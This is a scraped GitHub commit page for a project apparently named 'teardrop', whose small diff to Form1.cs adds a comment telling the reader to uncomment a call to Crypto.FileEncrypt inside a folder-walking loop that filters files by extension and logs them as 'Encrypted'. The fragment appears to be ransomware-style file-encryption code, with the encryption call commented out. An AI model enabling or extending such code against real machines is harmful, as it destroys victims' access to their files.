We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 2c3e254 commit f9619e1Copy full SHA for f9619e1
teardrop/teardrop/Form1.cs
@@ -131,6 +131,7 @@ private void ShowAllFoldersUnder(string path, int indent)
131
132
if (validExtensions.Contains(ext) && !skipPath.Contains(s))
133
{
134
+ // Uncomment Line below to encrypt files
135
//Crypto.FileEncrypt(s, Properties.Settings.Default.key);
136
write("Encrypted " + s);
137
}
0 commit comments